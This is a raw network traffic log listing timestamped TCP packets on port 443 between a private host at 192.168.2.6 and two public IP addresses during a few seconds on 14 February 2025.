Feb 14, 2025 19:50:13.027539968 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:13.048223019 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:13.091345072 CET	443	51519	172.217.18.14	192.168.2.6
Feb 14, 2025 19:50:13.340610981 CET	443	51519	172.217.18.14	192.168.2.6
Feb 14, 2025 19:50:13.340703011 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:13.340724945 CET	443	51519	172.217.18.14	192.168.2.6
Feb 14, 2025 19:50:13.340991020 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:13.341053009 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:13.341100931 CET	443	51519	172.217.18.14	192.168.2.6
Feb 14, 2025 19:50:13.341172934 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:13.379492998 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:13.379539013 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:13.379717112 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:13.380352020 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:13.380388021 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:14.021652937 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:14.021986961 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:14.026103973 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:14.026113033 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:14.026410103 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:14.026547909 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:14.033308983 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:14.075335026 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.542344093 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.542474031 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.542900085 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.543082952 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.554577112 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.554708958 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.554723978 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.554996967 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.630775928 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.630820036 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.631027937 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.631072998 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.631083012 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.631103992 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.631139040 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.637166977 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.639338017 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.639345884 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.639394999 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.643393040 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.643558979 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.643565893 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.643754959 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.649671078 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.651335955 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.651343107 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.651777983 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.655889034 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.656044960 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.656059027 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.656116962 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.662029028 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.662116051 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.662133932 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.662511110 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.667808056 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.667889118 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.667895079 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.667973995 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.673831940 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.673928976 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.673949003 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.674032927 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.679821014 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.679939985 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.679946899 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.680052042 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.685792923 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.685941935 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.685961008 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.686085939 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.691627979 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.691833019 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.719208002 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.719299078 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.719310045 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.719379902 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.719410896 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.719451904 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.719508886 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.719518900 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.719535112 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.719733000 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.719733000 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.720145941 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.720212936 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.722203016 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.722313881 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.722321033 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.722381115 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.737166882 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.737219095 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.737312078 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.737339020 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.737339020 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.737353086 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.737430096 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.737430096 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.742254019 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.742628098 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.742647886 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.743129015 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.747128963 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.747190952 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.747199059 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.747338057 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.752316952 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.752844095 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.752861023 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.753169060 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.757055998 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.757128954 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.757136106 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.757652998 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.762154102 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.762218952 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.762237072 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.762295961 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.767019033 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.767092943 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.767102003 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.767354965 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.771927118 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.771996021 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.772005081 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.772049904 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.776447058 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.776536942 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.776545048 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.776611090 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.780942917 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.781034946 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.781049013 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.781272888 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.784976006 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.785017014 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.785037994 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.785044909 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.785072088 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.785100937 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.785106897 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.785150051 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.789083958 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.789242029 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.789259911 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.789324999 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.793133974 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.793199062 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.793207884 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.793315887 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.796952009 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.797029018 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.797039986 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.797080994 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.800870895 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.800923109 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.800934076 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.800987005 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.804651976 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.804708958 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.804723024 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.804765940 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.808517933 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.808631897 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.808646917 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.808779955 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.810884953 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.810961008 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.810971975 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.811089039 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.813261986 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.813306093 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.813316107 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.813361883 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.815552950 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.815618992 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.815623045 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.815670013 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.817785978 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.817845106 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.817900896 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.817951918 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.820204973 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.820269108 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.820275068 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.820368052 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.822458029 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.822525978 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.822534084 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.822577000 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.824702978 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.824770927 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.824805021 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.824966908 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.827006102 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.827075958 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.827090025 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.827141047 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.829340935 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.829410076 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.829425097 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.829484940 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.831679106 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.831731081 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.831739902 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.831840038 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.833880901 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.833950996 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.833960056 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.834012985 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.836158991 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.836221933 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.836261988 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.836383104 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.838372946 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.838438034 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.838448048 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.838515043 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.840560913 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.840665102 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.840677023 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.840851068 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.842751980 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.842817068 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.842875004 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.842974901 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.844996929 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.845092058 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.845102072 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.845165014 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.847162962 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.847214937 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.847227097 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.847347021 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.849946976 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.850058079 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.850070000 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.850229979 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.851808071 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.851854086 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.851859093 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.851901054 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.853667974 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.853723049 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.853746891 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.853791952 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.855823040 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.855894089 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.855902910 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.855942011 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.857985973 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.858064890 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.858076096 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.858273029 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.860363007 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.860438108 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.860446930 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.860582113 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.862257957 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.862394094 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.862410069 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.862530947 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.865103006 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.865164995 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.865174055 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.865223885 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.866420031 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.866589069 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.866610050 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.866730928 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.869270086 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.869389057 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.869396925 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.869481087 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.870541096 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.870635033 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.870647907 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.870692968 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.873368025 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.873500109 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.873507977 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.873570919 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.874689102 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.874748945 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.874790907 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.874805927 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.874815941 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.874870062 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.877469063 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.877573013 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.877584934 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.877640009 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.878688097 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.878757000 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.878762960 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.878829956 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.881556988 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.881604910 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.881617069 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.881661892 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.882647038 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.882762909 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.882777929 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.882844925 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.885442972 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.885495901 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.885507107 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.885705948 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.886562109 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.886632919 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.886643887 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.886780024 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.889295101 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.889355898 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.889405012 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.889605999 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.890333891 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.890664101 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.890683889 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.890877008 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.893205881 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.893354893 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.893377066 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.893439054 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.894270897 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.894335985 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.894346952 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.894409895 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.897133112 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.897171021 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.897186041 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.897272110 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.897335052 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.897427082 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.897450924 CET	443	51527	142.250.185.225	192.168.2.6
Feb 14, 2025 19:50:16.897507906 CET	51527	443	192.168.2.6	142.250.185.225
Feb 14, 2025 19:50:16.899466038 CET	443	51527	142.250.185.225	192.168.2.6
